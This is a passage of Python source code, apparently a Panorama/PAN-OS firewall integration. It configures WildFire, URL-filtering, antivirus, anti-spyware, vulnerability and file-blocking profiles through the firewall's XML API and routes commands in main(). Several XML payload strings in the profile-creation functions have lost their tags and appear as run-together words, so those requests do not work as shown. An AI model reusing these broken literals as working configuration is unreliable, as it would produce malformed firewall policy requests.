result.get('response', {}).get('result', {}).get('wildfire', {})\n\n file_size_limit = system_config.get('file-size-limit', {}).get('entry', [])\n for item in file_size_limit:\n file_size.append({\n 'Name': item.get('@name'),\n 'Size-limit': item.get('size-limit')\n })\n\n report_grayware_file = system_config.get('report-grayware-file') or 'No'\n human_readable = tableToMarkdown(f'WildFire Configuration\\n Report Grayware File: {report_grayware_file}',\n file_size, ['Name', 'Size-limit'], removeNull=True)\n\n result_schedule = get_wildfire_update_schedule(template)\n\n schedule = result_schedule.get('response', {}).get('result', {}).get('wildfire')\n if '@dirtyId' in schedule:\n demisto.debug(f'Found uncommitted item:\\n{schedule}')\n raise Exception('Please commit the instance prior to getting the WildFire configuration.')\n\n human_readable += tableToMarkdown('The updated schedule for Wildfire', schedule)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.WildFire(val.Name == obj.Name)': file_size,\n 'Panorama.WildFire.Schedule': schedule\n }\n })\n\n\n@logger\ndef enforce_wildfire_system_config(template: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']/\"\n f\"config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting\",\n 'key': API_KEY,\n 'element': '10'\n '30'\n '10002000'\n '5'\n '51'\n '10'\n '220'\n 'yes'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\n@logger\ndef enforce_wildfire_schedule(template: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']/config/\"\n f\"devices/entry[@name='localhost.localdomain']/deviceconfig/system/update-schedule/wildfire\",\n 'key': API_KEY,\n 'element': 'download-and-install'\n }\n\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef enforce_wildfire_best_practice_command(template: str):\n enforce_wildfire_system_config(template)\n enforce_wildfire_schedule(template)\n\n return_results('The schedule was updated according to the best practice.'\n '\\nRecurring every minute with the action of \"download and install\"\\n'\n 'The file upload for all file types is set to the maximum size.')\n\n\n@logger\ndef url_filtering_block_default_categories(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/url-filtering/entry[@name='{profile_name}']/block\",\n 'key': API_KEY,\n 'element': 'adulthackingcommand-and-control'\n 'copyright-infringementextremismmalware'\n 'phishingproxy-avoidance-and-anonymizersparked'\n 'unknowndynamic-dns'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef url_filtering_block_default_categories_command(profile_name: str):\n url_filtering_block_default_categories(profile_name)\n return_results(f'The default categories to block has been set successfully to {profile_name}')\n\n\ndef get_url_filtering_best_practice_command():\n best_practice = {\n '@name': 'best-practice', 'credential-enforcement': {\n 'mode': {'disabled': False},\n 'log-severity': 'medium',\n 'alert': {\n 'member': [\n 'abortion', 'abused-drugs', 'adult', 'alcohol-and-tobacco', 'auctions', 'business-and-economy',\n 'computer-and-internet-info', 'content-delivery-networks', 'cryptocurrency', 'dating',\n 'educational-institutions', 'entertainment-and-arts', 'financial-services', 'gambling', 'games',\n 'government', 'grayware', 'health-and-medicine', 'high-risk', 'home-and-garden',\n 'hunting-and-fishing', 'insufficient-content', 'internet-communications-and-telephony',\n 'internet-portals', 'job-search', 'legal', 'low-risk', 'medium-risk', 'military', 'motor-vehicles',\n 'music', 'newly-registered-domain', 'news', 'not-resolved', 'nudity', 'online-storage-and-backup',\n 'peer-to-peer', 'personal-sites-and-blogs', 'philosophy-and-political-advocacy',\n 'private-ip-addresses', 'questionable', 'real-estate', 'recreation-and-hobbies',\n 'reference-and-research', 'religion', 'search-engines', 'sex-education', 'shareware-and-freeware',\n 'shopping', 'social-networking', 'society', 'sports', 'stock-advice-and-tools', 'streaming-media',\n 'swimsuits-and-intimate-apparel', 'training-and-tools', 'translation', 'travel', 'weapons',\n 'web-advertisements', 'web-based-email', 'web-hosting']},\n 'block': {'member': ['command-and-control', 'copyright-infringement', 'dynamic-dns', 'extremism',\n 'hacking', 'malware', 'parked', 'phishing', 'proxy-avoidance-and-anonymizers',\n 'unknown']}},\n 'alert': {'member': ['abortion', 'abused-drugs', 'adult', 'alcohol-and-tobacco', 'auctions',\n 'business-and-economy', 'computer-and-internet-info', 'content-delivery-networks',\n 'cryptocurrency', 'dating', 'educational-institutions', 'entertainment-and-arts',\n 'financial-services', 'gambling', 'games', 'government', 'grayware', 'health-and-medicine',\n 'high-risk', 'home-and-garden', 'hunting-and-fishing', 'insufficient-content',\n 'internet-communications-and-telephony', 'internet-portals', 'job-search', 'legal',\n 'low-risk', 'medium-risk', 'military', 'motor-vehicles', 'music',\n 'newly-registered-domain', 'news', 'not-resolved', 'nudity', 'online-storage-and-backup',\n 'peer-to-peer', 'personal-sites-and-blogs', 'philosophy-and-political-advocacy',\n 'private-ip-addresses', 'questionable', 'real-estate', 'recreation-and-hobbies',\n 'reference-and-research', 'religion', 'search-engines', 'sex-education',\n 'shareware-and-freeware', 'shopping', 'social-networking', 'society', 'sports',\n 'stock-advice-and-tools', 'streaming-media', 'swimsuits-and-intimate-apparel',\n 'training-and-tools', 'translation', 'travel', 'weapons', 'web-advertisements',\n 'web-based-email', 'web-hosting']},\n 'block': {'member': ['command-and-control', 'copyright-infringement', 'dynamic-dns', 'extremism', 'hacking',\n 'malware', 'parked', 'phishing', 'proxy-avoidance-and-anonymizers', 'unknown']}}\n\n headers_best_practice = {\n 'log-http-hdr-xff': 'yes',\n 'log-http-hdr-user': 'yes',\n 'log-http-hdr-referer': 'yes',\n 'log-container-page-only': 'no'\n }\n rules = prettify_get_url_filter(best_practice)\n human_readable = tableToMarkdown('URL Filtering Best Practice Profile Categories', rules)\n human_readable += tableToMarkdown('Best Practice Headers', headers_best_practice)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': best_practice,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.URLFilter': rules,\n 'Panorama.URLFilter.Header': headers_best_practice\n }\n })\n\n\n@logger\ndef create_antivirus_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/virus/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n ''\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n ''\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_antivirus_best_practice_profile_command(profile_name: str):\n create_antivirus_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_anti_spyware_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/spyware/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"\n criticalanyany\n disable\n highanyany\n disable\n mediumanyany\n disable\n informationalanyany\n disable\n lowanyany\n disable\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_anti_spyware_best_practice_profile_command(profile_name: str):\n create_anti_spyware_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_vulnerability_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/vulnerability/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"300\n source-and-destinationany\n anyanyany\n anybrute-forcedisable\n any\n criticalanyany\n clientanydisable\n any\n highanyany\n clientanydisable\n any\n mediumanyany\n clientanydisable\n any\n informationalany\n anyclientany\n disable\n any\n lowanyany\n clientanydisable\n any\n criticalanyany\n serveranydisable\n any\n highanyany\n serveranydisable\n any\n mediumanyany\n serveranydisable\n any\n informationalanyany\n serveranydisable\n any\n lowanyany\n serveranydisable\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_vulnerability_best_practice_profile_command(profile_name: str):\n create_vulnerability_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_url_filtering_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/url-filtering/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"medium\n abortionabused-drugsalcohol-and-tobacco\n auctionsbusiness-and-economycomputer-and-internet-info\n content-delivery-networkscryptocurrencydating\n educational-institutionsentertainment-and-arts\n financial-servicesgamblinggamesgovernment\n graywarehealth-and-medicinehigh-risk\n home-and-gardenhunting-and-fishinginsufficient-content\n internet-communications-and-telephonyinternet-portals\n job-searchlegallow-riskmedium-risk\n militarymotor-vehiclesmusic\n newly-registered-domainnewsnot-resolved\n nudity\n online-storage-and-backuppeer-to-peerpersonal-sites-and-blogs\n philosophy-and-political-advocacyprivate-ip-addresses\n questionablereal-estaterecreation-and-hobbies\n reference-and-researchreligionsearch-engines\n sex-educationshareware-and-freewareshopping\n social-networkingsocietysports\n stock-advice-and-toolsstreaming-media\n swimsuits-and-intimate-appareltraining-and-tools\n translationtravel\n weaponsweb-advertisementsweb-based-email\n web-hostingadultcommand-and-control\n copyright-infringementdynamic-dnsextremism\n hackingmalwareparkedphishing\n proxy-avoidance-and-anonymizersunknown\n yesyes\n yesno\n abortionabused-drugsalcohol-and-tobacco\n auctionsbusiness-and-economycomputer-and-internet-info\n content-delivery-networkscryptocurrencydating\n educational-institutionsentertainment-and-arts\n financial-servicesgamblinggamesgovernment\n graywarehealth-and-medicinehigh-risk\n home-and-gardenhunting-and-fishinginsufficient-content\n internet-communications-and-telephonyinternet-portals\n job-searchlegallow-risk\n medium-riskmilitary\n motor-vehiclesmusicnewly-registered-domain\n newsnot-resolvednudity\n online-storage-and-backuppeer-to-peerpersonal-sites-and-blogs\n philosophy-and-political-advocacyprivate-ip-addresses\n questionablereal-estaterecreation-and-hobbies\n reference-and-researchreligionsearch-engines\n sex-educationshareware-and-freewareshopping\n social-networkingsocietysports\n stock-advice-and-toolsstreaming-media\n swimsuits-and-intimate-appareltraining-and-tools\n translationtravel\n weaponsweb-advertisementsweb-based-email\n web-hostingadultcommand-and-control\n copyright-infringementdynamic-dnsextremism\n hackingmalwareparkedphishing\n proxy-avoidance-and-anonymizersunknown\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_url_filtering_best_practice_profile_command(profile_name: str):\n create_url_filtering_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_file_blocking_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/file-blocking/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"any\n 7zbatcabchmclass\n cpldllexeflashhlp\n htajarmsiMulti-Level-Encoding\n ocxPEpifrarscr\n tartorrentvbewsf\n bothblock\n anyencrypted-rar\n encrypted-zipbothblock\n any\n anybothalert\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_file_blocking_best_practice_profile_command(profile_name: str):\n create_file_blocking_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_wildfire_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/wildfire-analysis/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"any\n anybothpublic-cloud\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_wildfire_best_practice_profile_command(profile_name: str):\n create_wildfire_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\ndef prettify_zones_config(zones_config: Union[List, Dict]) -> Union[List, Dict]:\n pretty_zones_config = []\n if isinstance(zones_config, dict):\n return {\n 'Name': zones_config.get('@name'),\n 'Network': zones_config.get('network'),\n 'ZoneProtectionProfile': zones_config.get('zone-protection-profile'),\n 'EnableUserIdentification': zones_config.get('enable-user-identification', 'no'),\n 'LogSetting': zones_config.get('log-setting')\n }\n\n for zone in zones_config:\n pretty_zones_config.append({\n 'Name': zone.get('@name'),\n 'Network': zone.get('network'),\n 'ZoneProtectionProfile': zone.get('zone-protection-profile'),\n 'EnableUserIdentification': zone.get('enable-user-identification', 'no'),\n 'LogSetting': zone.get('log-setting')\n })\n\n return pretty_zones_config\n\n\ndef get_interfaces_from_zone_config(zone_config: Dict) -> List:\n \"\"\"Extract interfaces names from zone configuration\"\"\"\n # a zone has several network options as listed bellow, a single zone my only have one network option\n possible_zone_layers = ['layer2', 'layer3', 'tap', 'virtual-wire', 'tunnel']\n\n for zone_layer in possible_zone_layers:\n zone_network_info = zone_config.get('network', {}).get(zone_layer)\n\n if zone_network_info:\n interfaces = zone_network_info.get('member')\n if interfaces:\n if isinstance(interfaces, str):\n return [interfaces]\n\n else:\n return interfaces\n\n return []\n\n\ndef prettify_user_interface_config(zone_config: Union[List, Dict]) -> Union[List, Dict]:\n pretty_interface_config = []\n if isinstance(zone_config, dict):\n interfaces = get_interfaces_from_zone_config(zone_config)\n\n for interface in interfaces:\n pretty_interface_config.append({\n 'Name': interface,\n 'Zone': zone_config.get('@name'),\n 'EnableUserIdentification': zone_config.get('enable-user-identification', 'no')\n })\n\n else:\n for zone in zone_config:\n interfaces = get_interfaces_from_zone_config(zone)\n\n if isinstance(interfaces, str):\n interfaces = [interfaces]\n\n for interface in interfaces:\n pretty_interface_config.append({\n 'Name': interface,\n 'Zone': zone.get('@name'),\n 'EnableUserIdentification': zone.get('enable-user-identification', 'no')\n })\n\n return pretty_interface_config\n\n\ndef show_user_id_interface_config_request(args):\n template = args.get('template') if args.get('template') else TEMPLATE\n template_stack = args.get('template_stack')\n vsys = args.get('vsys')\n\n if VSYS and not vsys:\n vsys = VSYS\n elif not vsys:\n vsys = 'vsys1'\n\n # firewall instance xpath\n if VSYS:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n\n # panorama instance xpath\n elif not template_stack:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"template/entry[@name=\\'\" + template + \"\\']/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/template-stack/entry[@name=\\'\" + template_stack + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return dict_safe_get(result, keys=['response', 'result', 'zone', 'entry'])\n\n\ndef show_user_id_interface_config_command(args: dict):\n raw_response = show_user_id_interface_config_request(args)\n\n if raw_response:\n formatted_results = prettify_user_interface_config(raw_response)\n return_results(\n CommandResults(\n outputs_prefix=\"Panorama.UserInterfaces\",\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('User Interface Configuration:', formatted_results,\n ['Name', 'Zone', 'EnableUserIdentification'],\n removeNull=True),\n raw_response=raw_response\n )\n )\n\n else:\n return_results(\"No results found\")\n\n\ndef show_zone_config_command(args):\n raw_response = show_user_id_interface_config_request(args)\n\n if raw_response:\n formatted_results = prettify_zones_config(raw_response)\n return_results(\n CommandResults(\n outputs_prefix=\"Panorama.Zone\",\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('Zone Configuration:', formatted_results,\n ['Name', 'Network', 'EnableUserIdentification',\n 'ZoneProtectionProfile', 'LogSetting'],\n removeNull=True),\n raw_response=raw_response\n )\n )\n\n else:\n return_results(\"No results found\")\n\n\ndef list_configured_user_id_agents_request(args, version):\n template = args.get('template') if args.get('template') else TEMPLATE\n template_stack = args.get('template_stack')\n vsys = args.get('vsys')\n\n if VSYS and not vsys:\n vsys = VSYS\n elif not vsys:\n vsys = 'vsys1'\n\n if VSYS:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"vsys/entry[@name=\\'\" + vsys + \"\\']/user-id-agent\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/redistribution-agent\"\n\n elif template_stack:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template-stack\" \\\n \"/entry[@name=\\'\" + template_stack + \"\\']/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/user-id-agent\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template-stack\" \\\n \"/entry[@name=\\'\" + template_stack + \"\\']/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/redistribution-agent\"\n else:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\\'\" + template + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \\\n \"\\']/user-id-agent\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\\'\" + template + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \\\n \"\\']/redistribution-agent\"\n\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n if version < 10:\n return dict_safe_get(result, keys=['response', 'result', 'user-id-agent', 'entry'])\n\n else:\n return dict_safe_get(result, keys=['response', 'result', 'redistribution-agent', 'entry'])\n\n\ndef prettify_configured_user_id_agents(user_id_agents: Union[List, Dict]) -> Union[List, Dict]:\n pretty_user_id_agents = []\n if isinstance(user_id_agents, dict):\n return {\n 'Name': user_id_agents['@name'],\n 'Host': dict_safe_get(user_id_agents, keys=['host-port', 'host']),\n 'Port': dict_safe_get(user_id_agents, keys=['host-port', 'port']),\n 'NtlmAuth': dict_safe_get(user_id_agents, keys=['host-port', 'ntlm-auth'], default_return_value='no'),\n 'LdapProxy': dict_safe_get(user_id_agents, keys=['host-port', 'ldap-proxy'], default_return_value='no'),\n 'CollectorName': dict_safe_get(user_id_agents, keys=['host-port', 'collectorname']),\n 'Secret': dict_safe_get(user_id_agents, keys=['host-port', 'secret']),\n 'EnableHipCollection': user_id_agents.get('enable-hip-collection', 'no'),\n 'IpUserMapping': user_id_agents.get('ip-user-mappings', 'no'),\n 'SerialNumber': user_id_agents.get('serial-number'),\n 'Disabled': user_id_agents.get('disabled', 'no')\n }\n\n for agent in user_id_agents:\n pretty_user_id_agents.append({\n 'Name': agent['@name'],\n 'Host': dict_safe_get(agent, keys=['host-port', 'host']),\n 'Port': dict_safe_get(agent, keys=['host-port', 'port']),\n 'NtlmAuth': dict_safe_get(agent, keys=['host-port', 'ntlm-auth'], default_return_value='no'),\n 'LdapProxy': dict_safe_get(agent, keys=['host-port', 'ldap-proxy'], default_return_value='no'),\n 'CollectorName': dict_safe_get(agent, keys=['host-port', 'collectorname']),\n 'Secret': dict_safe_get(agent, keys=['host-port', 'secret']),\n 'EnableHipCollection': agent.get('enable-hip-collection', 'no'),\n 'IpUserMapping': agent.get('ip-user-mappings', 'no'),\n 'SerialNumber': agent.get('serial-number'),\n 'Disabled': agent.get('disabled', 'no')\n })\n\n return pretty_user_id_agents\n\n\ndef list_configured_user_id_agents_command(args):\n version = get_pan_os_major_version()\n raw_response = list_configured_user_id_agents_request(args, version)\n if raw_response:\n formatted_results = prettify_configured_user_id_agents(raw_response)\n headers = ['Name', 'Disabled', 'SerialNumber', 'Host', 'Port', 'CollectorName', 'LdapProxy', 'NtlmAuth',\n 'IpUserMapping']\n\n return_results(\n CommandResults(\n outputs_prefix='Panorama.UserIDAgents',\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('User ID Agents:', formatted_results,\n headers, removeNull=True),\n raw_response=raw_response\n )\n )\n else:\n return_results(\"No results found\")\n\n\ndef initialize_instance(args: Dict[str, str], params: Dict[str, str]):\n global URL, API_KEY, USE_SSL, USE_URL_FILTERING, VSYS, DEVICE_GROUP, XPATH_SECURITY_RULES, XPATH_OBJECTS, \\\n XPATH_RULEBASE, TEMPLATE, PRE_POST\n if not params.get('port'):\n raise DemistoException('Set a port for the instance')\n\n URL = params.get('server', '').rstrip('/:') + ':' + params.get('port', '') + '/api/'\n API_KEY = str(params.get('key'))\n USE_SSL = not params.get('insecure')\n USE_URL_FILTERING = params.get('use_url_filtering')\n TEMPLATE = params.get('template')\n\n # determine a vsys or a device-group\n VSYS = params.get('vsys', '')\n\n if args and args.get('device-group'):\n DEVICE_GROUP = args.get('device-group') # type: ignore[assignment]\n else:\n DEVICE_GROUP = params.get('device_group', None) # type: ignore[arg-type]\n\n PRE_POST = args.get('pre_post', '')\n\n # configuration check\n if DEVICE_GROUP and VSYS:\n raise DemistoException(\n 'Cannot configure both vsys and Device group. Set vsys for firewall, set Device group for Panorama.')\n if not DEVICE_GROUP and not VSYS:\n raise DemistoException('Set vsys for firewall or Device group for Panorama.')\n\n # setting security xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if device_group_shared == 'shared':\n XPATH_SECURITY_RULES = \"/config/shared/\"\n DEVICE_GROUP = device_group_shared\n else:\n XPATH_SECURITY_RULES = \"/config/devices/entry/device-group/entry[@name=\\'\" + DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_SECURITY_RULES = \"/config/devices/entry/vsys/entry[@name=\\'\" + VSYS + \"\\']/rulebase/security/rules/entry\"\n\n # setting objects xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if DEVICE_GROUP == 'shared':\n XPATH_OBJECTS = \"/config/shared/\"\n DEVICE_GROUP = device_group_shared\n else:\n XPATH_OBJECTS = \"/config/devices/entry/device-group/entry[@name=\\'\" + DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_OBJECTS = \"/config/devices/entry/vsys/entry[@name=\\'\" + VSYS + \"\\']/\" # ignore:\n\n # setting security rulebase xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if DEVICE_GROUP == 'shared':\n XPATH_RULEBASE = \"/config/shared/\"\n DEVICE_GROUP = device_group_shared\n else:\n XPATH_RULEBASE = \"/config/devices/entry[@name='localhost.localdomain']/device-group/entry[@name=\\'\" + \\\n DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_RULEBASE = f\"/config/devices/entry[@name=\\'localhost.localdomain\\']/vsys/entry[@name=\\'{VSYS}\\']/\"\n\n\ndef panorama_upload_content_update_file_command(args: dict):\n category = args.get('category')\n entry_id = args.get('entryID')\n file_path = demisto.getFilePath(entry_id)['path']\n file_name = demisto.getFilePath(entry_id)['name']\n shutil.copy(file_path, file_name)\n with open(file_name, 'rb') as file:\n params = {'type': 'import', 'category': category, 'key': API_KEY}\n response = http_request(uri=URL, method=\"POST\", headers={}, body={}, params=params, files={'file': file})\n human_readble = tableToMarkdown(\"Results\", t=response.get('response'))\n content_upload_info = {\n 'Message': response['response']['msg'],\n 'Status': response['response']['@status']\n }\n results = CommandResults(raw_response=response,\n readable_output=human_readble,\n outputs_prefix=\"Panorama.Content.Upload\",\n outputs_key_field=\"Status\",\n outputs=content_upload_info)\n\n shutil.rmtree(file_name, ignore_errors=True)\n return results\n\n\n@logger\ndef panorama_install_file_content_update(version: str, category: str, validity: str):\n \"\"\"\n More information about the API endpoint of that request can see here:\n https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-panorama-api/pan-os-xml-api-request-types/run-operational-mode-commands-api.html#idb894d5f5-091f-4e08-b051-4c22cc9c660d\n \"\"\"\n if category == \"content\":\n params = {\n 'type': 'op',\n 'cmd': (\n f'<{category}>{validity}'\n f'{version}'),\n 'key': API_KEY\n }\n else:\n params = {\n 'type': 'op',\n 'cmd': (\n f'<{category}>{version}'\n f''), 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_file_content_update_command(args: dict):\n version = args.get('version_name')\n category = args.get('category')\n validity = args['skip_validity_check']\n result = panorama_install_file_content_update(version, category, validity)\n\n if 'result' in result.get('response'):\n # installation has been given a jobid\n content_install_info = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_info}\n human_readable = tableToMarkdown('Result:', content_install_info, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no content install took place\n return_results(result['response']['msg'])\n\n\ndef main():\n try:\n args = demisto.args()\n params = demisto.params()\n additional_malicious = argToList(demisto.params().get('additional_malicious'))\n additional_suspicious = argToList(demisto.params().get('additional_suspicious'))\n initialize_instance(args=args, params=params)\n LOG(f'Command being called is: {demisto.command()}')\n\n # Remove proxy if not set to true in params\n handle_proxy()\n\n if demisto.command() == 'test-module':\n panorama_test()\n\n elif demisto.command() == 'panorama':\n panorama_command(args)\n\n elif demisto.command() == 'panorama-commit':\n panorama_commit_command()\n\n elif demisto.command() == 'panorama-commit-status':\n panorama_commit_status_command(args)\n\n elif demisto.command() == 'panorama-push-to-device-group':\n panorama_push_to_device_group_command()\n\n elif demisto.command() == 'panorama-push-status':\n panorama_push_status_command(**args)\n\n # Addresses commands\n elif demisto.command() == 'panorama-list-addresses':\n panorama_list_addresses_command(args)\n\n elif demisto.command() == 'panorama-get-address':\n panorama_get_address_command(args)\n\n elif demisto.command() == 'panorama-create-address':\n panorama_create_address_command(args)\n\n elif demisto.command() == 'panorama-delete-address':\n panorama_delete_address_command(args)\n\n # Address groups commands\n elif demisto.command() == 'panorama-list-address-groups':\n panorama_list_address_groups_command(args)\n\n elif demisto.command() == 'panorama-get-address-group':\n panorama_get_address_group_command(args)\n\n elif demisto.command() == 'panorama-create-address-group':\n panorama_create_address_group_command(args)\n\n elif demisto.command() == 'panorama-delete-address-group':\n panorama_delete_address_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-address-group':\n panorama_edit_address_group_command(args)\n\n # Services commands\n elif demisto.command() == 'panorama-list-services':\n panorama_list_services_command(args.get('tag'))\n\n elif demisto.command() == 'panorama-get-service':\n panorama_get_service_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-service':\n panorama_create_service_command(args)\n\n elif demisto.command() == 'panorama-delete-service':\n panorama_delete_service_command(args.get('name'))\n\n # Service groups commands\n elif demisto.command() == 'panorama-list-service-groups':\n panorama_list_service_groups_command(args.get('tags'))\n\n elif demisto.command() == 'panorama-get-service-group':\n panorama_get_service_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-service-group':\n panorama_create_service_group_command(args)\n\n elif demisto.command() == 'panorama-delete-service-group':\n panorama_delete_service_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-service-group':\n panorama_edit_service_group_command(args)\n\n # Custom Url Category commands\n elif demisto.command() == 'panorama-get-custom-url-category':\n panorama_get_custom_url_category_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-custom-url-category':\n panorama_create_custom_url_category_command(args)\n\n elif demisto.command() == 'panorama-delete-custom-url-category':\n panorama_delete_custom_url_category_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-custom-url-category':\n panorama_edit_custom_url_category_command(args)\n\n # URL Filtering capabilities\n elif demisto.command() == 'url':\n if USE_URL_FILTERING: # default is false\n panorama_get_url_category_command(url_cmd='url', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n # do not error out\n\n elif demisto.command() == 'panorama-get-url-category':\n panorama_get_url_category_command(url_cmd='url', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n elif demisto.command() == 'panorama-get-url-category-from-cloud':\n panorama_get_url_category_command(url_cmd='url-info-cloud', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n elif demisto.command() == 'panorama-get-url-category-from-host':\n panorama_get_url_category_command(url_cmd='url-info-host', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n # URL Filter\n elif demisto.command() == 'panorama-get-url-filter':\n panorama_get_url_filter_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-url-filter':\n panorama_create_url_filter_command(args)\n\n elif demisto.command() == 'panorama-edit-url-filter':\n panorama_edit_url_filter_command(args)\n\n elif demisto.command() == 'panorama-delete-url-filter':\n panorama_delete_url_filter_command(demisto.args().get('name'))\n\n # EDL\n elif demisto.command() == 'panorama-list-edls':\n panorama_list_edls_command()\n\n elif demisto.command() == 'panorama-get-edl':\n 